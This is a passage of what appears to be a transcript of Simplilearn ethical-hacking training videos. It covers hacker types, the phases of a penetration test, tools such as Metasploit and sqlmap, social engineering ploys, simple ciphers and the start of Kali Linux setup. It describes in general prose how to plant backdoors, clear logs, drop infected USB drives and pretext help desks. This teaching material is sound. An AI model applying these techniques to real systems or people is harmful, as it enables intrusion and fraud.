everything, where you understand the business processes, you understand the business requirements, and based on those business requirements, you compare the technical implementations of computing powers that you have implemented, and then you're going to compare how those technical aspects can be converted into a risk. For example, a vulnerability assessment identifies a possible SQL injection attack. Now, technically it becomes a big risk. However, which system is being affected? If that system gets compromised, what kind of losses is the organization looking at? How much are they going to be? What kind of losses the organization is looking at? Are they looking at lawsuits from their customers? Are they looking at penalties from regulatory authorities? So that risk, that implied risk that if this vulnerability is hacked, that is the aspect that you want to look at when you're looking at risk information and controls. Similarly, you have CCSP. This is a Certified Cloud Security Professional Certification. So this is especially for people who want to deal with the cloud. Let it be a public cloud, a private cloud, or a hybrid cloud. This certification gives you an architectural overview over different aspects of cloud and how you want to implement security in a cloud-based scenario. So Simplilearn offers all of these certifications with trainings from certified professionals. So there's a master's program from Simplilearn which talks about becoming a cybersecurity expert, which includes all of these trainings. Once you have these kind of trainings and you get those certifications on your profile, that's where you're basically a cyber solutions or cybersecurity expert, and you'll be designing and developing security policies, structures, architectures for various organizations and helping them enhance the security of their infrastructure.
We humans are highly tech savvy in today's times. With the extensive use of the internet and modern technologies, there is a massive challenge in protecting all our digital data, such as net banking information, account credentials, and medical reports, to name a few. Have you heard about the deadly WannaCry ransomware attack? The attack happened in May 2017 in Asia, and then it spread across the world. Within a day, more than 230,000 computers were infected across 150 countries. The WannaCry cryptoworm encrypted the data and locked the users out of their systems. For decryption of the data, the users were asked for a ransom of $300 to $600 in Bitcoin. The users who used the unsupported version of Microsoft Windows and those who hadn't installed the security update of April 2017 were targeted in this attack. The WannaCry attack took a toll on every sector. Top-tier organizations like Hitachi, Nissan, and FedEx had to put their businesses on hold as their systems were affected too. Now, this is what you call a cyber attack. To prevent such attacks, cybersecurity is implemented. We can define cybersecurity as the practice of protecting networks, programs, computer systems, and their components from unauthorized digital attacks. These illegal attacks are often referred to as hacking. Hacking refers to exploiting weaknesses in a computer network to obtain unauthorized access to information. A hacker is a person who tries to hack into computer systems. This is a misconception that hacking is always wrong. There are hackers who work with different motives. Let's have a look at 3 different types of hackers. Black hat hackers are individuals who illegally hack into a system for monetary gain. On the contrary, we have white hat hackers who exploit the vulnerabilities in a system by hacking into it with permission in order to defend the organization. This form of hacking is absolutely legal and ethical. Hence, they are also often referred to as ethical hackers. In addition to these hackers, we also have the gray hat hackers. As the name suggests, the color gray is a blend of both white and black. These hackers discover vulnerabilities in a system and report it to the system's owner, which is a good act. But they do this without seeking the owner's approval. Sometimes gray hat hackers also ask for money in return for the spotted vulnerabilities. Now that you have seen the different types of hackers, let's understand more about the hacking that is legal and valid, ethical hacking, through an interesting story. Dan runs a trading company. He does online training with the money his customers invest. Everything was going well, and Dan's business was booming, until a hacker decided to hack the company's servers. The hacker stole the credentials of various trading accounts. He asked for a lump sum ransom in exchange for the stolen credentials. Dan took the hacker's words lightly and didn't pay the hacker. As a result, the hacker withdrew money from various customers' accounts, and Dan was liable to pay back the customers. Dan lost a lot of money, and also the trust of his customers. After this incident, Dan gave a lot of thought as to what could have gone wrong with the security infrastructure in his company. He wished there was someone from his company who could have run a test attack to see how vulnerable his systems were before the hacker penetrated into the network. This was when he realized he needed an employee who thinks like a hacker and identifies the vulnerabilities in his network before an outsider does. To do this job, he hired an ethical hacker, John. John was a skilled professional who worked precisely like a hacker. In no time, he spotted several vulnerabilities in Dan's organization and closed all the loopholes. Hiring an ethical hacker helped Dan protect his customers from further attacks in the future. This, in turn, increased the company's productivity and guarded the company's reputation. So, now you know hacking is not always bad. John, in this scenario, exposed the vulnerabilities in the existing network, and such hacking is known as ethical hacking. Ethical hacking is distributed into 6 different phases. Let us look at these phases step by step with respect to how John, our ethical hacker, will act. Before launching an attack, the first step John takes is to gather all the necessary information about the organization's system that he intends to attack. This step is called reconnaissance. He uses tools like Nmap and hping for this purpose. John then tries to spot the vulnerabilities, if any, in the target system using tools like Nmap and Nexpose. This is the scanning phase. Now that he has located the vulnerabilities, he then tries to exploit them. This step is known as gaining access. After John makes his way through the organization's networks, he tries to maintain his access for future attacks by installing backdoors in the target system. The Metasploit tool helps him with this. This phase is called maintaining access. John is a brilliant hacker. Hence, he tries his best not to leave any evidence of his attack. This is the 5th phase, clearing tracks. We now have the last phase, that is reporting. In this phase, John documents a summary of his entire attack, the vulnerabilities he spotted, the tools he used, and the success rate of the attack. Looking into the report, Dan is now able to take a call and see how to protect his organization from any external cyber attacks. Don't you all think John is an asset to any organization? If you want to become an ethical hacker like John, then there are a few skills that you need to acquire. First and foremost, you need to have a good knowledge of operating environments such as Windows, Linux, Unix, and Macintosh. You must have reasonably good knowledge of programming languages such as HTML, PHP, Python, SQL, and JavaScript. Networking is the base of ethical hacking, hence, you should be good at it. Ethical hackers should be well aware of security laws so that they don't misuse their skills. Finally, you must have a global certification on ethical hacking to successfully bag a position of an ethical hacker like John. Few examples of ethical hacking certification are Certified Ethical Hacker Certification, CEH, CompTIA Pentest Plus, and Licensed Penetration Tester Certification, to name a few. Simplilearn provides a cybersecurity expert master's program that will equip you with all the skills required by a cybersecurity expert. You could have a look at it by clicking the link in the description. The endless growth of technologies in this area is directly proportional to the number of cybercrimes. Cybercrimes are estimated to cost $6 trillion in 2021. Hence, to tackle these cybercrimes, organizations are continuously on the lookout for cybersecurity professionals. The average annual salary of a certified ethical hacker is $91,000 in the US and approximately rupees 7 lakhs in India. So, what are you waiting for? Get certified and become an ethical hacker like John and put an end to the cyber attacks in the world.
So let's talk about hacking and what exactly hacking is. Hacking refers to exploiting weaknesses in a computer network to obtain unauthorized access to information. A hacker is a person who tries to hack into computer systems. Now here there are some keywords that we need to understand. First and foremost, exploit. When you are exploiting weaknesses are technically called vulnerabilities, which are basically design flaws, misconfiguration errors, usage of default usernames and passwords which have not been modified. So any misconfiguration or anything that has been left behind by a security administrator that can be misused, which means exploited by a hacker to gain unauthorized access. So the next term is unauthorized access, something that you're not allowed to do. And when you say a hacker is a person who tries to hack, it's basically a person with malicious intent trying to gain access to a system or a resource that they are not authorized to access in the first place. How do they do it? They find a vulnerability that is a weakness or a flaw, and then they misuse it to gain access to that particular network. So here in the diagram, you can see that the sender on the left hand side is trying to send some data to the receiver on the right hand side. The hacker would try to gain unauthorized access to the transmission that is being sent and would try to capture the data packets and read the secrets within. Let's look at a business case scenario into hacking. Now there is an organization, everybody is going around their own business when they realize that their systems may have been compromised. Now they're trying to look at the customer data to ensure that that has not been compromised and trying to assure the customers. However, they do realize that some customer data has been lost and even the company reports have been modified as well. Now this is the scenario where there have been some security controls in place and those controls have been identified. They realized that there is an attack that has happened, and based on that attack they have realized that their data has now been compromised and their records have been modified by the hacker, which means that the data is no longer trustworthy and thus cannot be used by the business for any legal transactions. So then the hacker gives a call to the organization or gets connected to the organization demanding a ransom for the data to be replaced, to be taken back into the original state where it was trusted, and thus the organization can utilize it for business transactions. The organization has probably no backup, so they decide that they want to pay the lump sum to the hacker to restore that data so that they can continue on with the business. Thus money exchanges and the hacker is able to restore that data and the business continues as usual. However, the activity here of a hacker trying to leverage the misconfiguration of the weaknesses in the organization's security, thus being able to hack them and make these ransomware demands. So the company then wants to figure out, even if having a security system in place, how was the hacker able to hack their systems? Thus, one of the employees comes up with a brilliant idea of identifying vulnerabilities in the network to proactively search for any flaws that have been left behind, so that they can plug those flaws and nobody can misuse them. Thus, they figure out that they want to hire an ethical hacker who would help them identify the security posture of the organization, identify the weaknesses, vulnerabilities and flaws, and help them remedy those flaws so that in future scenarios, these scenarios will not happen. So before we go into an ethical hacker, let's understand what are the types of hackers. So what are the types of hackers? Hacker is a technically skilled person who is very adept with computers. They have good programming skills, they understand how operating system works, they understand how networks work, they understand how to identify flaws and vulnerabilities within all of these aspects, and then they understand and know how to misuse these flaws to get a outcome which would be detrimental to the health of the organization. So there's 6 types of hackers that have been identified: black hat hackers, white hat hackers, grey hat, script kiddies, nation sponsored hackers, and hacktivists. So black hat hackers are basically the malicious hackers who have malicious intent and have criminalistic tendencies. They want to harm the organization by hacking into their infrastructure, by destroying their infrastructure, by destroying their data, so that they can gain from it from a monetary perspective. These guys are also known as crackers. The main aspect of these people are that they have malicious intent, they try to do unauthorized activities, and they try it for personal gain. Another important aspect to remember is that a black hat hacker will always try to hide their identity. They will spoof their online digital identity by masking it, by spoofing their IP addresses, MAC addresses, and try to remain anonymous on the network. A white hat hacker, on the other hand, is also an ethical hacker or a security analyst who's an individual who will do exactly the same thing that a black hat hacker would do, minus the malicious intent, plus the intent of helping the organization identifying the flaws and remedying them so that nobody else can misuse those vulnerabilities. So they are authorized to act on the company's behalf. They are authorized to do that activity which would help the company identify those flaws and thus help the company mitigate those flaws, improving on their security posture. So these kind of security experts or ethical hackers would help organizations defend themselves against unauthorized attacks. Grey hat hackers is a blend of both white hat and black hat hackers. So here they can work defensively and offensively both. They can accept contracts from organizations to increase their security posture. At the same time, they can also get themselves involved in malicious activities towards other organizations to personally gain or benefit from them by doing unauthorized activity. Script kiddies are people who are technically not much aware about what hacking is. They rely on existing tools that have been created by other hackers. They have no technical knowledge of what they're doing. It's just a hit or miss for them. So they just get their hands on a tool. They try to execute those tools. If the hack works, it works. Otherwise, it doesn't. So these people are basically who are noobs or newbies who are trying to learn hacking, or just people who with malicious intent who just want to have some fun or trying to impress people around. Then we have the nation or the state-sponsored hackers. As the name suggests, these hackers are sponsored by their government. Now, this may not be a legitimate job, but most of the governments do have hackers enrolled in their on their organizations to spy on their enemies, to spy on various countries and try to figure out the aspirations of those countries. So this is basically a spying activity where you're technically trying to get access to other countries' resources and then try to spy on them to figure out what their activities have been or what their future plans have been. And then we have the hacktivists, who is an individual who has a political agenda to promote, and they promote it by doing hacking. So these guys, what is the difference between a black hat hacker and a hacktivist? The black hat hacker may try to hide their identity. A hacktivist will claim responsibility of what they have done. So for them, it's a political agenda, a political cause, and they will try to hack various organizations to promote their cause. They would probably do this by defacing the website and posting the messages that they want to promote on these websites. So what exactly is ethical hacking then? We have discussed the types of hackers. We have identified a malicious hacker as a black hat hacker with the intent of doing harm to an organization's network for personal gain. We have discussed what the ethical hacker is. So an ethical hacker would be doing the same activity but in an authorized manner. So they would have legal contracts that they would be signing with the organization, which would give them a definite scope of what they are allowed to do and what they are not allowed to do. And the ethical hackers would function within those scopes, would try to execute those test scenarios where they would be able to identify those flaws or those system vulnerabilities, and then they would be submitting a report to the management of what they have found. They would also help the management to mitigate or to resolve those weaknesses so that nobody else can misuse them later on. They might use the same techniques and the same tools that black hat hackers do. However, the main difference here is that these guys are authorized to do that particular activity. They're doing it in a controlled manner with the intent of helping the organization and not with the intent of personal gains. So who's an ethical hacker? Again, an ethical hacker is a highly intelligent, highly educated person who knows how computers function, how programming languages work, how operating systems work. They can troubleshoot. They're technically very adept at computing. They understand the architecture. They understand how various components in a computer work. They can troubleshoot those components, and they can basically be very good with programming as well. Now, when I say programming, we don't want an ethical hacker to be a good developer of applications. We want them to understand programming in such a way that they can create scripts, they can write their own short programs like viruses, worms, trojans, or exploits which would help them achieve the objective that they have set out for. So here you can see the ethical hacker. They are individuals who perform a security assessment of their companies with the permission of concerned authorities. So what is a security assessment? A security assessment is finding out the exact security posture of the organization by identifying what security controls are in place, how they've been configured, and if there are any gaps in the configurations themselves. So an organization will hire an ethical hacker. They would give the ethical hacker the information about what information is, or what security controls, what firewalls, what IDSS, IPSS, intrusion detection or intrusion prevention systems, antiviruses are already in place, and then they will ask the ethical hacker to figure out a way to bypass these mechanisms and see if they can still hack the organization. What is the need of an ethical hacker? The need of an ethical hacker is proactive security. The ethical hacker would identify all the existing flaws in an organization and try to resolve those flaws to help secure the organization from black hat hackers. So ethical hackers would prevent hackers from cracking into an organization's network by securing the organization, by improving on their security on a periodic basis. And they would also try to identify system vulnerabilities, network vulnerabilities, or application level vulnerabilities that would have been missed or have already been missed, and then try to figure out a way of plugging them or resolving them so that they cannot be misused by other hackers. They would also analyze and enhance an organization's security policies. Now, what are policies? Policies are basically documents that have been created by an organization of rules that all the employees need to follow to ensure that the security of an organization is maintained. For example, a password policy. A password policy would help users in an organization to adhere to the standards the organization has identified for a password complexity. For example, a password, when a user is creating them, should adhere to standards where they are using random words. They contain the alphabet A through Z, uppercase and lowercase, 0 through 9 as numerics, and special characters, and they are randomized so that the password becomes more stronger to prevent from brute force attacks. So what would an ethical hacker do at this point in time? They would try to test the strength of the passwords to see if brute force attacks or dictionary attacks are possible, and if any of these passwords can be cracked. They would ensure that all the employees are following the policies and all the passwords are as secured as the policies want them to be. If there are any gaps in the policies or the implementation of the policy, it is the ethical hacker's responsibility to identify those gaps and warn the organization about it. Similarly, they would also try to protect any personal information, any data that is owned by the organization that is critical for the functioning of the organization, and they will try to protect it from falling into the hacker's hands. Now, what are the skills that are required of an ethical hacker? These are the following skills. So first and foremost, they should have good knowledge with operating systems such as Windows, Linux, Unix, and Mac. Now, when we say knowledge about operating systems, it's not only about how to use those operating systems, but how to troubleshoot those operating systems, how these operating systems work, how these operating systems need to be configured, how can they be secured. For example, securing an operating system is not only installing a firewall and an antivirus, but you need to configure permissions on an operating system of what users are allowed to do and what users are not allowed to do. For example, limiting the installation of applications. How are we going to do that? We need to go into the system center, the security center of Windows, and we need to configure security parameters over there of what are acceptable softwares and what are not. Same with Linux and Mac softwares, operating systems. So we need to know how we can secure these operating systems. Similarly, all of these would have desktop versions and server versions of operating systems. As an ethical hacker, we need to know the desktop and server versions both, how to configure them and how to provide services within the organization on these servers so that they can be consumed in a secure manner by all the employees. At the same time, they should also be knowledgeable of programming languages or scripting languages such as PHP, Python, Ruby, HTML, for programming, if you will, because web servers come into the picture. So again, they should not be great developers where they can create huge applications, but they should be able to develop scripts, understand those scripts, analyze those scripts, and figure out what the output should be of those scripts to achieve the hacking goals that they have set out for. An ethical hacker should have a very good understanding about networking. No matter whether you're in application security, you're in network security, or you're in host-based security, since a computer will always be connected to a network, either a local area network like a LAN or the internet, we should know how networking works. We should know the 7 layers of the OSI model. We should know which protocols work on those 7 layers. We should identify the TCP/IP model and how a OSI model can be mapped to the TCP/IP model. We should understand how TCP and UDP work, how each and every protocol is crafted, how they are supposed to behave for us to analyze and understand any network-based attacks. We should be very good in security measures. So we should know where those vulnerabilities would lie, what are the latest exploits available in the market, and we should be able to identify them. We should be able to know the techniques and the tools of how to deal with security, how to analyze security, and then how to implement security to enhance it as well. Along with that, it is important that a security analyst or ethical hacker is aware of the local security laws and standards. Why is that? Because an organization cannot do any illegal activity. Whatever responses that they have, whatever security mechanisms, whatever security controls they will implement, they need to be adhering to the local law of the land. They should be legal in nature and should not cause undue harm to any of the employees or any of the third-party clients that they are dealing with. So the ethical hacker should be aware of what security laws are before they implement security controls, or even before they start testing for security controls. And all of these should be backed up by having a global certification or a globally valid certification related to networking, related to security, ethical hacking, the law of the land, anything and everything. Maybe even programming. It's good to have a certification in PHP, Perl, Python, Ruby, and so on and so forth. Why? Because most of the organizations, when they hire ethical hackers, look out for these certifications, especially globally valid certifications, so that they can be sure, or they can be assured that the person that they are hiring has the required skill set. So let's talk about a few of the tools that an ethical hacker would utilize in their testing scenarios. To be honest, there are hundreds of tools out there. What you see on the screen are just a few examples of them. Nessus is a vulnerability scanner. What is a vulnerability scanner? It is an automated tool that is designed to identify vulnerabilities within hosts, within operating systems, within networks. So they come with their ready-made databases of all the vulnerabilities that have already been identified, and they scan the network against that database to find out any possible flaws or any possible vulnerabilities that currently exist on the host or the operating system or on the network. Similarly, there would be application scanners like Acunetics or Arachne that would help you scan applications and identify flaws within those applications as well. Now, all of these are automated tools. The essence of ethical hacker is when these tools churn out the reports, the ethical hacker can understand these reports, analyze them, identify the flaws, and then craft their own exploits or use existing exploits in a particular manner so that they can get access, or they can bypass the access or security controls mechanisms that are already in place. How can they do that? With the tool called Metasploit. You see that big M there on the right hand side? That M logo is for a tool called Metasploit, which is a penetration testing tool. What is a penetration testing tool? It is that tool that will allow an ethical hacker to craft their exploits or choose their exploits for the vulnerabilities that have been identified by Nessus. Since we are interacting with computers, we will always be interacting using tools, right? So the first tool, Nessus, identifies the flaws and the possible list of vulnerabilities. We do a penetration test using Metasploit to validate those flaws and to verify that those flaws actually exist, and try to figure out the complexity of those flaws. And that's where Metasploit helps us do that. Wireshark would be used in the background while we are doing both the activities using Nessus or Metasploit to keep a track of what packets are being sent and received on the network, which will help us analyze those packets. So whenever I run a Nessus scanner, I would run a Wireshark in the background. It will capture the data packets, and I can go through those data packets and analyze that data packets to identify what Nessus is actually trying to do. Similarly, when I try to attack a machine using exploit on Metasploit, I will keep on Wireshark running in the background to capture the data packets that have been sent and the responses that I've received from the victim, so that I can also go through those packets and analyze the responses and analyze the attack, whether it was successful, to what extent was it successful, and basically will also give me a validation, a proof of the activity that has happened. Nmap is another automated tool that allows me to scan for open ports and protocols. So why would I use Nmap? Because ports and protocols become an entry point for a hacker to gain access to devices. For example, when we connect to a web server, we connect through a web browser, but we automatically connect to port 80 using HTTP and port 443 is using HTTPS. So if I'm connecting to a web server using HTTPS, it is safe to assume that port 443 on the web server is open to accept those connections. Similarly, there would be other services that may be left open on the web server because nobody thought about configuring it, or they misconfigured the web server and they left unwanted services running. So Nmap will allow me to scan those ports and services and allow me to understand what services are being offered on that server, so then I can start analyzing that server, identify those flaws within those services, and then try to attack them. If the application that I'm analyzing is connected to a database and I want to do a SQL injection attack, or if Nessus tells me that there is a SQL injection attack that may be possible on that particular application, I can use an automated tool called SQL map or SQL map that would allow me to automatically craft all the queries that are required for a SQL injection attack and help me do that attack at the same time. So here I do not have to manually create my own queries. The SQL map tool would automatically create them for me. What I would do is I would use Nessus to identify that particular flaw. If Nessus reports that flaw, I would then go use the tool SQL map, configure it to attack that particular web server, and when I fire off the tool, it will then automatically start directing queries, SQL injection queries, to the database to see if those databases are vulnerable, and if yes, what data can be retrieved from those databases. So all of these tools in a nutshell would help me hack networks, applications, operating systems, and host devices. And this is what an ethical hacker does. They use these kind of tool sets, they identify what attacks they need to do, they identify the right tool for that particular attack, and they write their exploits, they create those attacks, and then they start attacking, analyze the response, and then give a report to the management, providing them feedback about how the attack was created or crafted, what was the response to that attack, and whether the attack was successful or not. If successful, they would also give recommendations of what to do to prevent these attacks from happening in the future. So when we are doing these attacks, or when we want to launch these attacks, what is the process that we would follow? So there are 6 steps that we would do as an ethical hacker. If you're just a hacker, you probably wouldn't do the 6th step, which is a reporting step. So the first step that would be done is the reconnaissance phase, which is the information gathering phase, which is very important from an ethical hacker's perspective or a hacker's perspective. Because if I want to attack someone or something as a digital device, I need to know what I'm attacking. I need to know the IP address of the device, the MAC address of those devices. I need to know the operating system, the build or the version of that operating systems, applications on top, the versions of those applications, so I know what I'm attacking. For example, if I want to attack a server, I assume it's a Windows-based server and I use a particular tool to attack it, but it actually turns out to be a Linux-based server, my attacks are going to be unsuccessful. So I need to focus my attack based on what is there at the other end. So in my information gathering phase, I want to identify all of that information. Once I have that information done, I'm going to scan those servers using tools like Nmap that we just talked about, and we're going to try to see the open ports, open services, and protocols that are running on that server that can give me possible entry points within the network or within the device or within the operating system. At the same time, along with the scanning with Nmap, I would run a vulnerability scanner, the Nessus vulnerability scanner we talked about, or Acunetics for applications, and then I would try to identify vulnerabilities in those applications, operating systems, or networks. Once I have identified those vulnerabilities in the scanning phase, I would then move on to the gaining phase, where I would then craft my exploits or choose existing exploits and start attacking the victim. At this point in time, if my attack is successful, I will probably have gained access by either cracking passwords or escalating privileges or exploiting a vulnerability that I may have found during the scanning phase. Once I have gained my access, I want to maintain my access.
Why? Because the vulnerability may not be there for long. Maybe somebody updated the operating system and hence the flaw was no longer existing, or somebody changed the password that I may have cracked, thus I no longer have access. So what do I do to maintain my access? I install Trojans or backdoor entries to those systems using which I can secretly, in a covert manner, get access to those devices at my own will, at my own time, as long as those devices are available over the network. So that's where I maintain my access. I have hacked them. Now I want to maintain my access, so I install a software which would give me a backdoor entry to that device no matter what. Once I've done this, I want to clear my tracks. So whatever activity that I've been doing, for example, installing a Trojan. A Trojan is also a software that would create directories and files once installed on the victim's machine. So I want to hide that. If I have accessed data stores, if I have modified data, I want to hide that activity, because if the victim comes to know that something has happened, they would start increasing their security parameters. They might start scanning their devices. They may take them offline. Thus my hack would no longer be efficient. The reason I'm clearing my tracks is that the victim doesn't find out that they have been hacked or they have been compromised, or even if they do find out that they've been compromised, they cannot trace the compromise back to me. So I would be deleting references of any of the IP addresses or MAC addresses that I may have used to attack that particular device. And this is where I will be able to identify where those logs were created, where those traces are. Once I take off those traces, the victim would not be any wiser of whether they have been compromised or who compromised their system. And if I am successful at all of these stages, or to whatever extent the success that I've achieved in any of these stages, I would then create a report based on that, and I would report to the management about the activities that we have been able to do and whatever we have been able to achieve out of those activities. For example, we identified 10 different flaws. There were 20 different attacks that we wanted to do. What attack did we do? What was the outcome of that attack? What was the intended or the expected output of that attack? I'll create a report which would give a detailed analysis of all the steps that were taken, along with screenshots and evidences of what activity was conducted, what was the output, what was the expected output, and I would submit that report to the management, giving them an idea of what vulnerabilities and flaws exist in their environment or their devices that need to be mitigated so that the security can be enhanced. So these are the 6 steps that the ethical hacking process would take. Just going through this, the reconnaissance is where you're going to use hacking tools like Nmap, HPing to obtain information about targets. There are hundreds of tools out there depending on what information you want. Then in scanning, again, Nmap, Nexpose, these kind of tools to be utilized to identify open ports, protocols, and services. In gaining access, you're going to exploit a vulnerability by using the Metasploit tool that we talked about in the previous slides. In the maintaining access, you're going to install backdoors. You can use Metasploit at the same time. You can craft your own scripts to create a Trojan and install it on the victim's machine. Once you have achieved that, clearing tracks is where you're going to clear all evidences of your activity so that you do not get caught or the victim doesn't even realize that they have been hacked. And once you're done all of this, we are going to create reports that are going to be submitted to the management to help them understand the current security evaluation of their organization. So now let's see how we can hack using social engineering. Now, what is social engineering? Social engineering is the art of manipulating humans into revealing confidential information which they otherwise would not have revealed. So this is where your social skill and your people skills come into the picture. If you are able to communicate effectively to another person, they would probably give up more information that they intended to give out. Let's look at examples, right? If you see on the screen, phishing activity. What is phishing? We receive a lot of fake mails on a regular basis. We have always received those emails where we have won a lottery of a few $1 million, but we have never realized that we didn't purchase a lottery to win a lottery in the first place. We have always had those Nigerian frauds where a prince died in some South African country and you out of 7 billion people on the planet have been identified where they want to transfer a few $100 million through your account and they want to give you 50% of that money in return as thank you. So some very basic attacks where you go onto websites and there's a banner flashing at you saying congratulations, you're the 1 millionth visitor to this website, click here to claim your prize. All of these are social engineering attacks, phishing attacks, fake websites, fake communications being sent out to users to prey on their gullibility. Most of humans always have that dream of striking it rich, winning a huge lottery once and for all, and living their life lavishly ever after. But sadly in the real world that doesn't happen that often. And if you're receiving those mails, it is very important that you first research the validity of those communications before you even want to act upon them. So why are humans susceptible to social engineering? Because humans have emotion, machines do not. Try pleading with a machine to give you access to an account that you have forgotten a password to. The machine wouldn't even know what you're doing. Try pleading with a human, sympathy or empathy, where you could try to create a social engineering attack where you can plead with them saying, if I do not get access to this account immediately, I might lose my job, and then that would put my family into problems. Somebody would feel empathy or sympathy towards you and help you reset that password and give you access to that account. It's how good the attack is and how convincing you are for the success of this attack to happen. So what is a familiarity exploit? Attackers interact with victims to gain information which will benefit the attackers to crack credentials. As passwords, if we want to reset our passwords, what do we have as a mechanism to resetting passwords? We have some security questions that we set up. Those questions are nothing but personal information that we would know, but through a social engineering attack, it would be easily be able to gather the information that you have set for your security questions. The security questions can be as simple as the first school that you attended. You probably have that listed on your LinkedIn profile, where a person can just go in there and see your academic qualifications and identify the school that you were in, right? Similarly, it might also be a question, what was your mother's maiden name? That's a very good attack. And that's, if a person can interact with you, let's say they're trying to take a survey and they approach you for a feedback on a particular product that you have been utilizing, and they ask you these questions, you wouldn't think twice before giving those answers. As long as the request sounds legitimate to us, we are able to justify that request, we do answer those queries. So it's upon us to verify the authenticity of the request coming in before we answer it. Phishing, as discussed, would be fraudulent emails which appear to be coming from a trusted source. So email spoofing comes into mind, fake websites, and so on and so forth. Exploiting human curiosity. Curiosity killed the cat, right? So there's so many physical attacks where hackers just keep pen drives lying around in a parking lot. Now this is a generic attack. Whoever falls victim will fall victim. So if I just throw around a few USBs in the parking lot, obviously with Trojans implemented on them, some people who are curious or who are looking for a couple of freebies might take up those pen drives, plug them in their computers to see what data is on the pen drives. At the same time, once they plug in those pen drives on their computers, the virus or the Trojan would get infected and cause harm to their machine. Then exploiting human greed. We just talked about the Nigerian frauds and the lotteries, those kind of attacks, the fake money making gimmicks. Now basically this is where you prey upon the person's greed kicking in, and they are clicking on those links in order to get that money that has been promised to them in that email. So one of the safest mechanism to keep data private and to keep yourself secure is using encryption. Now encryption can happen through cryptography. What is cryptography? Cryptography is the art of scrambling data using a particular algorithm so that the data becomes unreadable to the normal user. The only person with the key to unscramble that data would be able to unscramble it and make sense out of that data. So we're just making it unreadable or non-readable by using a particular key or a particular algorithm, and then we're going to send the key to the end user. The end user using this same key would then decrypt that data. If anybody compromises that data while it is being sent over the network, since it is encrypted, they would not be able to read it. So the encryption algorithm would be something like this. Now if you see the computer word once made into unreadable format would look like EQORXVGT. For an end user it wouldn't make any sense, but the person who has a key to unscramble that would be able to convert it back to computer and then understand the meaning of that word. So this is just a substitution cipher that is being shown on the screen. So what is the alphabet? The key is alphabet plus 3. So C plus 3 alphabets, that becomes E. O becomes Q. M becomes O. So the key that is utilized to scramble the data is the character that you are at. The third character from there would be the corresponding key. So the encrypted message is also known as a cipher. The decryption is just the other way around, where you know the key now and you can now figure out what that E corresponded to by going back 3 characters in the alphabet. most of the times a certified ethical hacker must decrypt a message without knowing the secret key. So let's say a ransomware has affected your organization or has affected a device, and you want to figure out or you want to decrypt that data. Now, as an ethical hacker, you wouldn't be for paying a ransom to the hacker, would you? So it is now your prerogative of how you're going to work around and how you're going to try to crack the encryption mechanism, how to crack the cipher to decrypt that message and see what's within it, right? Decryption without the use of a secret key, that is known as a cryptanalysis. Cryptanalysis is the reversing of an algorithm to figure out what the decryption was without using a key. So cryptanalysis can be done using various formats. The first one is a brute force attack, second is a dictionary attack, the third one is a rainbow table attack. A brute force attack is trying every combination, permutation and combination of the key to figure out what the key was. It is 100% successful but may take a lot of time. A dictionary attack is where you have created a list of possible encryption mechanisms, a list of possible cracks, and then you try to figure out whether those cracks work or not. Rainbow tables are where you have an encrypted text in hand and you're trying to figure out the similarities between the text that you have and the encrypted data that you wanted to decrypt in the first place. So in the brute force attack, you're trying every possible combination, permutation of what the key would be. In dictionary attack, you have a word list that would tantamount to the key, and if you're trying to match all the words listed in the text file or the word list to see if any of those words are going to work to decrypt that data. Here in the rainbow table, the ciphertext is compared with another ciphertext. You find out similarities and then you try to work or reverse engineer your way accordingly. So let's have a quick demo on cryptography before we end this session. So to begin with the demo of cryptography, we are on a website called spammimic.com, which will help us scramble the message that we created into a completely format which would be unrelated to the topic at hand. So if I say I want to encode a message, turn a short message into spam. So what this does is, you want to send across a secret message, you type in the secret message, a short one, and it will convert that into a spam mail. You send it across, so whoever's reading that spam mail would never get an idea of the embedded message within it. So if I want to type in a message here, hi, this is a secret message, the password is ASD@1234, and I want to send this out to people or to one of my colleagues, but I want to send it out in a secret manner so that others are not aware of this. So when I press on encode, what the algorithm will do is it will convert this message into a spam mail. So my message, hi, this is a secret message, the password is @1234 or ASD@1234, gets converted into this. Now if you read it, dear e-commerce professional, this letter was specially selected to be sent to you. This doesn't make sense. There is nowhere or no reference to the actual message that I've already said. So if I copy this entire message and I send it, let's say via email, to the recipient. Now the thing is that the recipient needs to know that I've encoded it using spam mimic. The algorithm needs to remain the same. So once they know that it is spam mimic, what they can do is, now in this instance what I'm going to do is I'm going to open up a new browser and I'm going to go to the same website. And at this point in time, I'm going to click on decode. When I click on decode, I'm going to paste the message that I've just copied. There we are. And this message is now being copied into a different browser. And if I decode this, you will see that it will convert it back to the original message that there was. So the key is there at spam mimic and it is embedded within the message. So whenever we paste the message in the decode factor, it knows what the key was and it can decrypt that message and give me the actual message that was embedded within it. There we are, the entire message. This is what we created in the Google Chrome browser, and in the Firefox browser we decoded. Similarly, if I want to protect these kind of messages, there is an aspenencrypt.com website where, let's say, we use text encryption and I want to encrypt the same message. This is a secret message. The password is ASD@1234, and then I give it a password to protect this message, let's say the word password, and I use the cipher to scramble this by using, let's say, AES, which is the strongest cipher right now, and I say encrypt. So this is what the encryption would look like, and basically if I don't have the password over here, if I decrypt it, you would see that the error has occurred. Now if I type in the password over here and then decrypt it, it will be able to convert that back into the unscrambled text, and it will give me what the original message was. This is a secret message. The password is ASD@1234. So if I want to keep my data secure from hackers, I want to scramble it in such a way that they would not be able to crack it, or it would be very difficult for them to crack it. And this is one of the first mechanisms that would be recommended by any ethical hacker to keep the data secure. Now let's talk about downloading and installing Kali Linux. Along with that, we'll also be looking at the basic commands that are required for Kali Linux. Alright, so I've opened my browser and we want to go to the Kali website. So we want to go to kali.org. You can directly type in kali.org and go to the website. I can just do a Google search and say Kali download, and it will give you the same website, but it will directly take you to the downloads pages. So either here or you can go to the home page. Cookies are being installed on your machine, so see which cookies you want to allow. I'm only going to use the necessary cookies to support this site, and you can see that this gives you the latest Kali Linux news and tutorials, gives you the latest release, what is in that release, and gives you a lot of documentation which will help you understand what tools have been developed and what functionality has been given in the latest version. If you want to download, you can directly go here and you can download Kali Linux. Now, Kali Linux is a 2.6 gigabyte download, so it's going to take time, the latest version being 2019.4. And we click over here. I'm using a download manager to manage all these huge downloads, and you can see it's pointed to the operating systems folder, and it is going to be a 2.57 GB download. So we click on download, and in the background, you can see this is going to be downloaded, and we're going to minimize this. And it will take a few minutes for that to download, but this is an ISO image, so we need to install it on a virtual machine. So what we need is we need to use a hypervisor which will allow us to create virtual machines. So we can either use VMware Workstation, which you can download from here. However, this is paid version, so you can see it is around $250 or something for this software, but it is a very good software to have. So if we click on download now, it is going to start the download. It's a 30-day trial period if you want to use it. After 30 days, you'll need to enter the key, which you'll get after purchasing the software. If you do not want to utilize 